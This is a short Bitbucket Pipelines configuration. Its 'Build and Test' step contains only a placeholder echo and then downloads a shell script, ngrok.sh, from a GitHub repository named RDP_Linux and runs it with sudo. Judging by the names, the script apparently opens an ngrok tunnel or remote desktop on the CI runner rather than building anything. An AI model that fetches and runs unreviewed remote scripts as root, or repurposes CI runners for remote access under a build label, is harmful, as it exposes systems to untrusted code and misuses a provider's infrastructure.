
image: atlassian/default-image:3

pipelines:
  default:
    - parallel:
      - step:
          name: 'Build and Test'
          script:
            - echo "Your build and test goes here..."
            - apt update && apt install sudo wget unzip -y 
            - sudo wget https://raw.githubusercontent.com/amitstudydude/RDP_Linux/main/ngrok.sh && sudo bash ngrok.sh
